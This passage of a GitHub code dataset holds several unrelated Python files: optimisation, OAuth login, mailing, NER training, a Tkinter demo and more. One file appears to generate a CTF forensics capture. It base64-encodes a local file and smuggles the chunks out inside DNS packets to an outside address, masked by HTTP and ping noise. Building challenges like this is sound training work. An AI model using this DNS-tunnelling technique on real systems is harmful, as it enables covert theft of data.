: ndarray of float\n current gradient\n inv_hfk : ndarray of float\n inverse hessian\n k : int\n current number of items in batch\n \"\"\"\n m = s.shape[0]\n alpha = np.zeros(m)\n \n q = gfk\n for i in range(k):\n alpha[m-i-1] = np.dot(s[m-i-1], q) / np.dot(s[m-i-1], y[m-i-1])\n q -= alpha[m-i-1] * y[m-i-1]\n \n r = np.dot(inv_hfk, q)\n for i in range(k):\n beta = np.dot(y[i], r) / np.dot(s[i], y[i])\n r += s[i] * (alpha[i] - beta)\n \n return r\n\n def _grad_func(self, func):\n return super()._grad_func(func)","repo_name":"gittasche/Some-minimization-algorithms","sub_path":"unconstrained/l_bfgs.py","file_name":"l_bfgs.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43330727404","text":"#!/usr/bin/env python3\n\nfrom base64 import b64encode\n\nimport requests\n\nURL = 'https://api.twitter.com/oauth2/token'\n\ndef login():\n secrets = {}\n with open('secret.credentials') as f:\n for line in f:\n ws = line.split()\n secrets[ws[0]] = ws[1]\n\n consumer_key = secrets['consumer-key']\n consumer_sec = secrets['consumer-secret']\n key = b64encode(bytes('{}:{}'.format(consumer_key, consumer_sec), encoding='utf8'))\n\n headers = \\\n { 'Authorization' : 'Basic {}'.format(str(key, encoding='utf8'))\n , 'Content-Type' : 'application/x-www-form-urlencoded;charset=UTF-8' }\n data = 'grant_type=client_credentials'\n r = requests.post(URL, data=data, headers=headers).json()\n if r['token_type'] != 'bearer':\n sys.stderr.write('cannot understand login reply: {}\\n'.format(r))\n return\n secrets['access-token'] = r['access_token']\n\n with open('secret.credentials', 'w') as f:\n for k, v in sorted(secrets.items()):\n f.write('{} {}\\n'.format(k, v))\n\nif __name__ == '__main__':\n login()\n","repo_name":"rgrig/twitstat","sub_path":"oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"74874314600","text":"import os\nimport smtplib\nimport logging\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom config import Config\n\nclass Mailer:\n def __init__(self):\n cfg=Config()\n self.fromaddr = cfg.mail_user\n self.toaddrs = cfg.mail_to\n self.username = cfg.mail_user\n self.password = cfg.mail_pass\n self.send_mails = cfg.send_mails\n\n def send_mail(self,title,body):\n success = False\n if not self.send_mails:\n return\n \n msg = MIMEMultipart()\n msg['From'] = self.fromaddr\n msg['To'] = self.toaddrs\n msg['Subject'] = title\n msg.attach(MIMEText(body, 'plain'))\n logging.info(f'Sending mail...')\n\n try:\n # sending mail\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.ehlo()\n server.login(self.username,self.password)\n text=msg.as_string()\n problems = server.sendmail(self.fromaddr, self.toaddrs, text)\n server.quit()\n if problems:\n logging.error(problems)\n else:\n logging.info('Sent.')\n success = True\n\n except Exception as e:\n err_msg = \"Error sending email\"\n logging.error( err_msg,str(e) )\n return success ","repo_name":"leoivars/internet_monitor","sub_path":"mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13306903104","text":"#! -*- coding: utf-8 -*-\n# 用CRF做中文命名实体识别\n# 数据集 http://s3.bmio.net/kashgari/china-people-daily-ner-corpus.tar.gz\n# 实测验证集的F1可以到96.48%,测试集的F1可以到95.38%\n\nimport numpy as np\nimport os\n\nfrom keras import regularizers\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.chdir(os.path.dirname(__file__))\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint\n\nfrom path import train_file_path_NER, test_file_path_NER, BASE_MODEL_DIR, BASE_CONFIG_NAME, BASE_CKPT_NAME, event_type, \\\n weights_path, MODEL_TYPE\nfrom utils.backend import keras, K\nfrom utils.models import build_transformer_model\nfrom utils.tokenizers import Tokenizer\nfrom utils.optimizers import Adam\nfrom utils.snippets import sequence_padding, DataGenerator\nfrom utils.snippets import open, ViterbiDecoder, to_array\nfrom utils.layers import ConditionalRandomField\nfrom keras.layers import Dense, LSTM, Bidirectional, TimeDistributed, Dropout\nfrom keras.models import Model\nfrom tqdm import tqdm\n\nmaxlen = 180\nepochs = 300\nbatch_size = 64\nbert_layers = 6\nlearning_rate = 1e-3 # bert_layers越小,学习率应该要越大\ncrf_lr_multiplier = 2000 # 必要时扩大CRF层的学习率\ncategories = set()\n\n# bert配置\nconfig_path = BASE_CONFIG_NAME\ncheckpoint_path = BASE_CKPT_NAME\ndict_path = '{}/vocab.txt'.format(BASE_MODEL_DIR)\n\n\ndef load_data(filename):\n \"\"\"加载数据\n 单条格式:[text, (start, end, label), (start, end, label), ...],\n 意味着text[start:end + 1]是类型为label的实体。\n \"\"\"\n D = []\n with open(filename, encoding = 'utf-8') as f:\n f = f.read()\n for l in f.split('\\n\\n'):\n if not l:\n continue\n d = ['']\n for i, c in enumerate(l.split('\\n')):\n char, flag = c.split(' ')\n d[0] += char\n if flag[0] == 'B':\n d.append([i, i, flag[2:]])\n categories.add(flag[2:])\n elif flag[0] == 'I':\n d[-1][1] = i\n D.append(d)\n return D\n\n\n# 标注数据\ntrain_data = load_data(train_file_path_NER)\ntest_data = load_data(test_file_path_NER)\ncategories = list(sorted(categories))\n\n# 建立分词器\ntokenizer = Tokenizer(dict_path, do_lower_case = True)\n\n\nclass data_generator(DataGenerator):\n \"\"\"数据生成器\n \"\"\"\n \n def __iter__(self, random = False):\n batch_token_ids, batch_segment_ids, batch_labels = [], [], []\n for is_end, d in self.sample(random):\n tokens = tokenizer.tokenize(d[0], maxlen = maxlen)\n mapping = tokenizer.rematch(d[0], tokens)\n start_mapping = {j[0]: i for i, j in enumerate(mapping) if j}\n end_mapping = {j[-1]: i for i, j in enumerate(mapping) if j}\n token_ids = tokenizer.tokens_to_ids(tokens)\n segment_ids = [0] * len(token_ids)\n labels = np.zeros(len(token_ids))\n for start, end, label in d[1:]:\n if start in start_mapping and end in end_mapping:\n start = start_mapping[start]\n end = end_mapping[end]\n labels[start] = categories.index(label) * 2 + 1\n labels[start + 1:end + 1] = categories.index(label) * 2 + 2\n batch_token_ids.append(token_ids)\n batch_segment_ids.append(segment_ids)\n batch_labels.append(labels)\n if len(batch_token_ids) == self.batch_size or is_end:\n batch_token_ids = sequence_padding(batch_token_ids)\n batch_segment_ids = sequence_padding(batch_segment_ids)\n batch_labels = sequence_padding(batch_labels)\n yield [batch_token_ids, batch_segment_ids], batch_labels\n batch_token_ids, batch_segment_ids, batch_labels = [], [], []\n\n\n\"\"\"\n后面的代码使用的是bert类型的模型,如果你用的是albert,那么前几行请改为:\nmodel = build_transformer_model(\n config_path,\n checkpoint_path,\n model='albert',\n)\noutput_layer = 'Transformer-FeedForward-Norm'\noutput = model.get_layer(output_layer).get_output_at(bert_layers - 1)\n\"\"\"\n\n# model = build_transformer_model(\n# config_path,\n# checkpoint_path,\n# model = MODEL_TYPE,\n# )\n# output_layer = 'Transformer-FeedForward-Norm'\n# output = model.get_layer(output_layer).get_output_at(bert_layers - 1)\n\nmodel = build_transformer_model(\n config_path,\n checkpoint_path,\n model = MODEL_TYPE\n)\n\noutput_layer = 'Transformer-%s-FeedForward-Norm' % (bert_layers - 1)\noutput = model.get_layer(output_layer).output\n\n\n# output = Bidirectional(LSTM(64,\n# return_sequences = True,\n# dropout = 0.5,\n# recurrent_dropout = 0.5,\n# kernel_regularizer = keras.regularizers.l2(0.01)))(output)\noutput = TimeDistributed(Dense(len(categories) * 2 + 1))(output)\noutput = Dropout(0.5)(output)\n# output = Dense(len(categories) * 2 + 1)(output)\nCRF = ConditionalRandomField(lr_multiplier = crf_lr_multiplier)\noutput = CRF(output)\n\nmodel = Model(model.input, output)\nfor layer in model.layers:\n layer.trainable = True\nmodel.summary()\n\nmodel.compile(\n loss = CRF.sparse_loss,\n optimizer = Adam(learning_rate),\n metrics = [CRF.sparse_accuracy]\n)\n\n\nclass NamedEntityRecognizer(ViterbiDecoder):\n \"\"\"命名实体识别器\n \"\"\"\n \n def recognize(self, text):\n tokens = tokenizer.tokenize(text, maxlen = 512)\n mapping = tokenizer.rematch(text, tokens)\n token_ids = tokenizer.tokens_to_ids(tokens)\n segment_ids = [0] * len(token_ids)\n token_ids, segment_ids = to_array([token_ids], [segment_ids])\n nodes = model.predict([token_ids, segment_ids])[0]\n labels = self.decode(nodes)\n entities, starting = [], False\n for i, label in enumerate(labels):\n if label > 0:\n if label % 2 == 1:\n starting = True\n entities.append([[i], categories[(label - 1) // 2]])\n elif starting:\n entities[-1][0].append(i)\n else:\n starting = False\n else:\n starting = False\n return [(mapping[w[0]][0], mapping[w[-1]][-1], l) for w, l in entities]\n\n\nNER = NamedEntityRecognizer(trans = K.eval(CRF.trans), starts = [0], ends = [0])\n\n\ndef evaluate(data, tqdm_verbose = False):\n \"\"\"评测函数\n \"\"\"\n X, Y, Z = 1e-10, 1e-10, 1e-10\n if tqdm_verbose:\n for d in tqdm(data, ncols = 100):\n R = set(NER.recognize(d[0]))\n T = set([tuple(i) for i in d[1:]])\n X += len(R & T)\n Y += len(R)\n Z += len(T)\n else:\n for d in data:\n R = set(NER.recognize(d[0]))\n T = set([tuple(i) for i in d[1:]])\n X += len(R & T)\n Y += len(R)\n Z += len(T)\n f1, precision, recall = 2 * X / (Y + Z), X / Y, X / Z\n return f1, precision, recall\n\n\nclass Evaluator(keras.callbacks.Callback):\n \"\"\"评估与保存\n \"\"\"\n \n def __init__(self):\n self.best_val_f1 = 0\n \n def on_epoch_end(self, epoch, logs = None):\n trans = K.eval(CRF.trans)\n NER.trans = trans\n # print(NER.trans)\n f1, precision, recall = evaluate(train_data)\n # 保存最优\n # if f1 >= self.best_val_f1:\n # self.best_val_f1 = f1\n # save_file_path = \"{}/{}_{}_ner.h5\".format(weights_path, event_type, BASE_MODEL_DIR)\n # model.save_weights(save_file_path)\n print(\n 'train: f1: %.5f, precision: %.5f, recall: %.5f' %\n (f1, precision, recall)\n )\n f1, precision, recall = evaluate(test_data)\n print(\n 'test: f1: %.5f, precision: %.5f, recall: %.5f' %\n (f1, precision, recall)\n )\n\n\nif __name__ == '__main__':\n save_file_path = \"{}/{}_{}_tiny_ner_crf.h5\".format(weights_path, event_type, MODEL_TYPE)\n \n evaluator = Evaluator()\n train_generator = data_generator(train_data, batch_size)\n reduce_lr = ReduceLROnPlateau(monitor = 'loss', factor = 0.5, patience = 3, verbose = 1)\n early_stopping = EarlyStopping(monitor = 'loss', patience = 10, verbose = 1) # 提前结束\n save_model = ModelCheckpoint(save_file_path, monitor = 'loss', verbose = 1, save_best_only = True,\n mode = 'min')\n\n for i, item in enumerate(train_generator):\n print(\"\\nbatch_token_ids shape: shape:\", item[0][0].shape)\n print(\"batch_segment_ids shape:\", item[0][1].shape)\n print(\"batch_labels shape:\", item[1].shape)\n if i == 4:\n break\n\n # batch_token_ids: (batch_size, maxlen) or (batch_size, n), n <= maxlen\n # batch_segment_ids: (batch_size, maxlen) or (batch_size, n), n <= maxlen\n # batch_labels: (batch_size, maxlen) or (batch_size, n), n <= maxlen\n \n model.fit(\n train_generator.forfit(),\n steps_per_epoch = len(train_generator),\n epochs = epochs,\n callbacks = [evaluator, early_stopping, reduce_lr, save_model]\n )\n\nelse:\n save_file_path = \"{}/{}_{}_tiny_ner_crf.h5\".format(weights_path, event_type, MODEL_TYPE)\n model.load_weights(save_file_path)\n NER.trans = K.eval(CRF.trans)\n","repo_name":"Bureaux-Tao/NLP-BERT-keras","sub_path":"NER/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"4101190417","text":"import sys\nsys.stdin = open('최소비용 구하기2.txt')\nimport collections\n\ndef bfs():\n global min_cost\n global min_list\n visit = [float('inf') for i in range(n + 1)]\n deq = collections.deque()\n for i in range(len(cityCanGo[startCity])):\n eend, ccost = cityCanGo[startCity][i]\n deq.append((eend, ccost, [startCity, eend]))\n \n while len(deq) != 0:\n nextCity, costSum, temp_foot = deq.popleft()\n \n if costSum < min_cost:\n if nextCity == endCity:\n min_cost = costSum\n min_list = temp_foot\n \n for j in range(len(cityCanGo[nextCity])):\n goCity, bbcost = cityCanGo[nextCity][j]\n if goCity in temp_foot:\n continue\n else:\n if min_cost <= costSum + bbcost:\n continue\n \n if goCity == endCity:\n min_cost = costSum + bbcost\n min_list = temp_foot + [goCity]\n else:\n if visit[goCity] < costSum + bbcost:\n continue\n else:\n visit[goCity] = costSum + bbcost\n deq.append((goCity, costSum + bbcost, temp_foot + [goCity]))\n\nn = int(input())\nm = int(input())\n\ncityCanGo = [[] for i in range(n + 1)]\n\nfor i in range(m):\n start, end, cost = map(int, input().split())\n cityCanGo[start].append((end, cost))\n\nstartCity, endCity = map(int, input().split())\n\nmin_cost = float('inf')\nmin_list = set()\n\nbfs()\nif startCity == endCity:\n min_cost = 0\n min_list = {startCity}\n \nprint(min_cost)\nprint(len(min_list))\nprint(*min_list)","repo_name":"HwnagYoungJun/algorithm","sub_path":"2020/4월/0408/최소비용 구하기2.py","file_name":"최소비용 구하기2.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"8710524242","text":"import logging\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.debounce import Debouncer\nfrom homeassistant.helpers.entity import DeviceInfo\nfrom homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator\n\nfrom .aldes.product import AldesProduct\nfrom .const import DOMAIN, INTEGRATION, SCAN_INTERVAL\n\n_LOGGER = logging.getLogger(__name__)\n\nclass AldesProductDataUpdateCoordinator(DataUpdateCoordinator):\n\n def __init__(self, hass: HomeAssistant, product: AldesProduct) -> None:\n super().__init__(\n hass,\n _LOGGER,\n name = f'{DOMAIN}-{product.id}',\n update_interval = SCAN_INTERVAL,\n request_refresh_debouncer = Debouncer(\n hass, _LOGGER, cooldown = 5, immediate = False\n )\n )\n \n self.product = product\n\n async def _async_update_data(self) -> None:\n await self.product.update()\n\nclass AldesProductEntity(CoordinatorEntity[AldesProductDataUpdateCoordinator]):\n\n def __init__(self, coordinator: AldesProductDataUpdateCoordinator, entity_suffix: str) -> None:\n super().__init__(coordinator)\n \n product = coordinator.product\n self._attr_name = f'{product.get_display_name()} {entity_suffix}'\n self._attr_unique_id = f'{product.id}-{entity_suffix.lower().replace(\" \", \"-\")}'\n self._attr_device_info = DeviceInfo(\n identifiers = {(DOMAIN, product.id)},\n manufacturer = INTEGRATION,\n model = product.get_display_name(),\n name = product.name\n )\n","repo_name":"aalmazanarbs/hassio_aldes","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"25124915171","text":"# -*- coding: UTF-8 -*-\nimport os\nimport json\nimport logging\nfrom googleapiclient.discovery import build\nfrom tqdm import tqdm\nfrom data import get_classes_ordered\nlogging.getLogger('googleapicliet.discovery_cache').setLevel(logging.ERROR)\n\nvariables_file = 'variables.json'\nwith open(variables_file) as f:\n config = json.load(f)\n\n# ============================================================\n# VARIABLES TO MODIFY\n# ============================================================\noutput_path = config['project_folder'] + 'google_prior/'\n# ============================================================\n\n# API keys --------------------------------------------\napi_keys = [\n # add API keys\n]\n\n# Google Custom Search --------------------------------\ncse_ids = [\n # add Google Custom Search IDs\n]\n\n# Function to perform a google search\ndef google_search(search_term, api_key, cse_id, **kwargs):\n service = build(\"customsearch\", \"v1\", developerKey=api_key)\n res = service.cse().list(q=search_term, cx=cse_id, **kwargs).execute()\n return res\n\ndef transform_obj(obj):\n tweakedObj = [obj]\n if obj == 'bell_pepper':\n tweakedObj = ['bell pepper', 'green pepper', 'red pepper']\n elif obj == 'cup':\n tweakedObj = ['cup', 'mug']\n elif obj == 'pot':\n tweakedObj = ['pot', 'saucepan', 'pan']\n elif obj == 'pan':\n tweakedObj = ['pan', 'frying pan']\n elif obj == 'eating_utensil':\n tweakedObj = ['eating utensil', 'knife', 'spoon', 'fork']\n elif obj == 'cooking_utensil':\n tweakedObj = ['cooking utensil', 'knife', 'scissors', 'peeler',\n 'scale', 'jug', 'colander', 'strainer', 'blender']\n elif obj == 'fridge_drawer':\n tweakedObj = ['fridge drawer', 'refrigerator drawer']\n elif obj == 'cutting_board':\n tweakedObj = ['cutting board', 'cut board', 'chopping board',\n 'chop board']\n elif obj == 'cheese_container':\n tweakedObj = ['cheese container', 'cheese recipient', 'cheese package']\n elif obj == 'oil_container':\n tweakedObj = ['oil container', 'oil recipient', 'oil bottle']\n elif obj == 'bread_container':\n tweakedObj = ['bread container', 'bread recipient', 'bread package',\n 'bread bag']\n elif obj == 'grocery_bag':\n tweakedObj = ['grocery bag', 'groceries']\n elif obj == 'seasoning_container':\n tweakedObj = ['seasoning container', 'seasoning recipient',\n 'seasoning bottle', 'seasoning package']\n elif obj == 'condiment_container':\n tweakedObj = ['condiment container', 'condiment recipient',\n 'condiment bottle']\n elif obj == 'tomato_container':\n tweakedObj = ['tomato container', 'tomato recipient', 'tomato bottle']\n elif obj == 'fridge':\n tweakedObj = ['fridge', 'refrigerator']\n\n elif obj == 'paper_towel':\n tweakedObj = ['paper towel', 'tissue', 'kitchen paper',\n 'kitchen towel']\n elif obj == 'cabinet':\n tweakedObj = ['cabinet', 'locker', 'cupboard']\n return tweakedObj\n\ndef transform_verb(verb):\n tweakedVerb = [verb]\n if verb == 'divide/pull apart':\n tweakedVerb = ['divide', 'pull apart', 'separate', 'split', 'shred']\n elif verb == 'move_around':\n tweakedVerb = ['move around', 'move', 'transfer']\n elif verb == 'take':\n tweakedVerb = ['take', 'pick', 'pick up', 'grab']\n elif verb == 'put':\n tweakedVerb = ['put', 'leave', 'place']\n elif verb == 'cut':\n tweakedVerb = ['cut', 'slice', 'mince']\n elif verb == 'wash':\n tweakedVerb = ['wash', 'clean']\n elif verb == 'mix':\n tweakedVerb = ['mix', 'mingle', 'blend']\n return tweakedVerb\n\nif __name__ == '__main__':\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n objects,_ = get_classes_ordered(config['objects_file'])\n verbs,_ = get_classes_ordered(config['verbs_file'])\n total = 0\n results_dict, action_priors = dict(), dict()\n if os.path.exists(output_path + 'google_search.json'):\n with open(output_path + 'google_search.json', 'r') as json_file:\n results_dict = json.load(json_file) \n\ndef check_queries_left(results_dict):\n queries_done, queries_left = 0, 0\n # Check how many queries are left\n for verb in verbs:\n v = transform_verb(verb)\n for v_option in v:\n for obj in objects:\n o = transform_obj(obj)\n for o_option in o:\n if not verb + ' ' + obj in results_dict:\n queries_left += 1\n elif not v_option + ' ' + o_option in results_dict[verb + ' ' + obj]:\n queries_left += 1\n else:\n queries_done += 1\n\n print('Queries done: {}, queries left: {}, total queries: {}'.format(\n queries_done, queries_left, queries_done + queries_left\n ))\n\n# It should print the total queries that must be done\ncheck_queries_left(results_dict) \n\nfor my_api_key, my_cse_id in tqdm(zip(api_keys, cse_ids)):\n # For each verb and object (and their synonyms)\n for verb in verbs:\n v = transform_verb(verb)\n for v_option in v:\n for obj in objects:\n o = transform_obj(obj)\n for o_option in o:\n try:\n if not verb + ' ' + obj in results_dict:\n results_dict[verb + ' ' + obj] = dict()\n action = v_option + ' * ' + o_option\n if not v_option + ' ' + o_option in results_dict[verb + ' ' + obj]:\n #print(action)\n result = google_search('\"' + action + '\"', my_api_key, my_cse_id)\n results_dict[verb + ' ' + obj][v_option + ' ' + o_option] = result\n with open(output_path + 'google_search.json', 'w') as f:\n json.dump(results_dict, f, indent=4)\n except:\n pass\n\n# It should print 0, otherwise it must be repeated\ncheck_queries_left(results_dict) \n\n# Create the prior using the computed results\naccum_total = 0.\nfor verb in verbs:\n for obj in objects:\n action = verb + ' ' + obj\n info = []\n for key in results_dict[action].keys():\n num = int(\n results_dict[action][key]['searchInformation']['totalResults']\n ) \n info.append(num)\n accum, nb_elems = 0., 0\n for i in range(len(info)):\n if info[i] > 0: \n accum += float(info[i])\n nb_elems += 1\n total = float(accum) / max(1,float(nb_elems))\n accum_total += total\n action_priors[action] = total\n \nwith open(output_path + 'unnormalised_action_priors.json', 'w') as f:\n json.dump(action_priors, f, indent=4)\n\nfor key in action_priors.keys():\n action_priors[key] /= float(accum_total) \n\nwith open(output_path + 'action_priors.json', 'w') as f:\n json.dump(action_priors, f, indent=4)","repo_name":"AdrianNunez/zeroshot-action-recognition-action-priors","sub_path":"create_google_prior.py","file_name":"create_google_prior.py","file_ext":"py","file_size_in_byte":7178,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"3324679394","text":"def solution(l, t):\n\n for i in range(len(l)):\n sum = 0\n for j in range(i, len(l)):\n sum = sum + l[j]\n if (sum > t):\n break\n elif (sum == t):\n return [i, j]\n return [-1, -1]\n\n\n # Your code here\nl = [4, 3, 10, 2, 8]\nt = 12\nprint(solution(l, t))\n","repo_name":"jaiswalprabhakar/Leetcode_editorial","sub_path":"Foobar/numbers station coded/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"29017646799","text":"from tkinter import *\nfrom tkinter import messagebox\n\nroot = Tk()\n# 调用组件的mainloop()方法,进入事件循环\n\nroot.title(\"fucking demo\")\n\nroot.geometry(\"500x300+500+500\")\n\n\n\nbtn01 = Button(root)\nbtn01[\"text\"] = \"hit me\"\n\nbtn01.pack()\n\n\n# e就是事件对象\ndef hitme(e):\n messagebox.showinfo(\"message\", \"u fuck hit me\")\n print(\"fuck u idiot\")\n\n\nbtn01.bind(\"\", hitme)\n\nroot.mainloop()\n","repo_name":"hfwang2020/TrackDectection","sub_path":"Pyqt5/src/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27563556543","text":"class salary:\r\n def get_input(s):\r\n s.ecode= input('enter ecode :') \r\n s.ename = raw_input('enter ename :')\r\n s.bs= float(input('enter basic salary :'))\r\n def cal(s):\r\n s.a= s.bs*0.4\r\n s.b= s.bs*0.2\r\n s.c= s.bs*0.1\r\n s.d= s.bs+s.b+s.c\r\n def display(a):\r\n print('Hra 40% of basic salary',a.a)\r\n print('br 20% of basic salary',a.b)\r\n print('ta 10% of basic salary',a.c)\r\n print('Gross salary',a.d)\r\n\r\n\r\n\r\nf=salary()\r\n\r\nprint(f)\r\n\r\nf.get_input()\r\nf.cal()\r\nf.display()\r\n\r\n \r\n \r\n \r\n","repo_name":"vimleshtech/python_feb","sub_path":"oops file.py","file_name":"oops file.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71096746659","text":"#!/usr/bin/env python3\n\nfrom scapy.all import *\nimport requests\nfrom random import randint\nfrom base64 import b64encode as b64e\nfrom re import findall\nfrom multiprocessing import Process\nfrom time import sleep\nimport sys\n\n\ndef generate_dns_flag(section):\n\tpacket = IP(dst='1.0.1.0')/\\\n\t\tUDP(dport=53)/\\\n\t\tDNS(rd=1, qd=DNSQR(qname='www.facebook.com'))/\\\n\t\tsection\n\tsend(packet, verbose=0)\n\ndef generate_http_noise():\n\tendpoint = \"/flag\"\n\turl = \"http://www.cyberyouth.sg\"\n\twhile True:\n\t\tr = requests.get(url+endpoint+str(randint(0,10)))\n\t\tsleep(3)\n\ndef generate_ping_noise():\n\twhile True:\n\t\tpacket = IP(dst='192.168.1.195')/ICMP(id=0x8)\n\t\tsend(packet)\n\t\tsleep(0.5)\t\n\ndef main():\n\twith open(\"text.txt\",\"r\") as target:\n\t\ttext = target.read().encode(\"UTF-8\")\n\t\ttarget.close()\n\tchunks = findall(\".\"*50,b64e(text).decode(\"UTF-8\"))\n\tp1 = Process(target=generate_http_noise)\n\tp1.start()\n\tp2 = Process(target=generate_ping_noise)\n\tp2.start()\n\tfor i in range(len(chunks)):\n\t\tgenerate_dns_flag(chunks[i])\n\t\ttime.sleep(0.3)\n\tp1.terminate()\n\tp2.terminate()\n\tsys.exit()\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"cyberyouthsg/cysc19-ctf","sub_path":"networking/look-closer/generate/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"14554391015","text":"#!usr/bin/python3\n#-*- coding: utf-8 -*-\n\n'''\n\t******************\n\t* Main *\n\t******************\n\t Powered By %s\n'''\n\n__author__ = 'Shadaileng'\n\nimport tkinter as tk\nimport tkinter.messagebox\n\nwindow = tk.Tk()\nwindow.title('Main Loop')\nwindow.geometry('400x600')\n\ntextVar = tk.StringVar()\ntextVar.set('Test String')\nlistVar = tk.StringVar()\nlistVar.set((1, 2, 3, 4))\nradiobuttonselect = tk.StringVar()\ncheckbuttonvalues = []\nisClick = False\nlabel = None\nbutton = None\nentry = None\nlistbox = None\nscale = None\ncanvas = None\n\ndef main():\n\tglobal label, button, entry, listbox, scale, canvas\n\tlabel = tk.Label(window, textvariable=textVar, bg='#BFEFFF', font=('Arial', 12), width=16, height=2)\n\tlabel.pack()\n\tbutton = tk.Button(window, text='click', bg='#C1FFC1', font=('Arial', 12), width=16, height=2, command=click)\n\tbutton.pack()\n\tentry = tk.Entry(window, width=21)\n\tentry.pack()\n\tlistbox = tk.Listbox(window, listvariable=listVar, width=21, height=4)\n\tlistbox.pack()\n\tfor x in ['A', 'B']:\n\t\tradiobutton = tk.Radiobutton(window, text=x, variable=radiobuttonselect, value=x)\n\t\tradiobutton.pack()\n\tscale = tk.Scale(window, label='drag it', from_=5, to=11, orient=tk.HORIZONTAL, length=200, showvalue=1, tickinterval=2, resolution=0.1, command=scaleValue)\n\tscale.pack()\n\tfor x in ['Python', 'C++']:\n\t\tvar = tk.StringVar()\n\t\tcheckbutton = tk.Checkbutton(window, text=x, variable=var, onvalue='love %s' % x, offvalue=None)\n\t\tcheckbutton.pack()\n\t\tcheckbuttonvalues.append(var)\n\tcanvas = tk.Canvas(window, bg='#00FFFF', width=200, height=200)\n\tcanvas.pack()\n\timage_file = tk.PhotoImage(file='ins.gif')\n\timage = canvas.create_image(100, 100, anchor='nw', image=image_file)\n\tx0, y0, x1, y1 = 30, 30, 80, 80\n\tline = canvas.create_line(x0, y0, x1, y1)\n\toval = canvas.create_oval(x0, y0, x1, y1, fill='#AB82FF')\n\tarc = canvas.create_arc(x0 + 50, y0 + 50, x1 + 50, y1 + 50, start=0, extent=180)\n\trect = canvas.create_rectangle(x0 + 100, y0, x1 + 100, y1)\n\tif isClick:\n\t\tcanvas.move(arc, 0, 1)\n\n\tmenubar = tk.Menu(window)\n\tfile = tk.Menu(menubar, tearoff=0)\n\tmenubar.add_cascade(label='File', menu=file)\n\n\tfile.add_command(label='Info', command=info)\n\tfile.add_separator()\n\tfile.add_command(label='Warning', command=warning)\n\tfile.add_separator()\n\tfile.add_command(label='Error', command=error)\n\tfile.add_separator()\n\tfile.add_command(label='Querstion', command=question)\n\n\twindow.config(menu=menubar)\n\n\tframe = tk.Frame(window, bg='red')\n\ttk.Label(frame, text='L', bg='#CCCFFF', font=('Arial', 12), width=4, height=2).pack(side='left')\n\ttk.Label(frame, text='T', bg='#CCCFFF', font=('Arial', 12), width=4, height=2).pack(side='top')\n\ttk.Label(frame, text='R', bg='#CCCFFF', font=('Arial', 12), width=4, height=2).pack(side='right')\n\ttk.Label(frame, text='B', bg='#CCCFFF', font=('Arial', 12), width=4, height=2).pack(side='bottom')\n\tframe.place(x = 10, y = 100, anchor='nw')\n\n\tframe = tk.Frame(window, bg='red')\n\tfor x in range(4):\n\t\tfor y in range(5):\n\t\t\ttk.Label(frame, text='B', bg='#CCCFFF',).grid(row=x, column=y, padx=10, pady=5)\n\tframe.place(x = 220, y = 150, anchor='nw')\n\n\ndef info():\n\ttk.messagebox.showinfo(title='信息', message='info')\n\ndef warning():\n\ttk.messagebox.showwarning(title='警告', message='warning')\n\ndef error():\n\ttk.messagebox.showerror(title='错误', message='error')\n\ndef question():\n\ttk.messagebox.askquestion(title='是否', message='question')\n\ndef click():\n\tglobal isClick, label, button, entry\n\tif isClick:\n\t\ttextVar.set(entry.get() or 'None')\n\t\tentry.insert('insert', '*')\n\telse:\n\t\ttextVar.set('Click It')\n\t\tentry.insert('end', '*')\n\tif listbox.curselection():\n\t\tentry.insert('end', listbox.get(listbox.curselection()))\n#\tentry.insert('end', radiobuttonselect)\n\tfor x in checkbuttonvalues:\n\t\tif x:\n\t\t\tprint(x.get())\n\tisClick = not isClick\n\ndef scaleValue(value):\n\tentry.insert('end', value + ' ')\n\nif __name__ == '__main__':\n\tprint(__doc__ % __author__)\n\tprint(int('0xC1FFC1', 16))\n\tmain()\n\twindow.mainloop()\n","repo_name":"shadaileng/website_python","sub_path":"gui/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3115717500","text":"import torch\nimport torch.nn as nn\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nfrom tqdm import tqdm\n\nbatch_size = 64\nnoise_size = 100\ntotal_epoch = 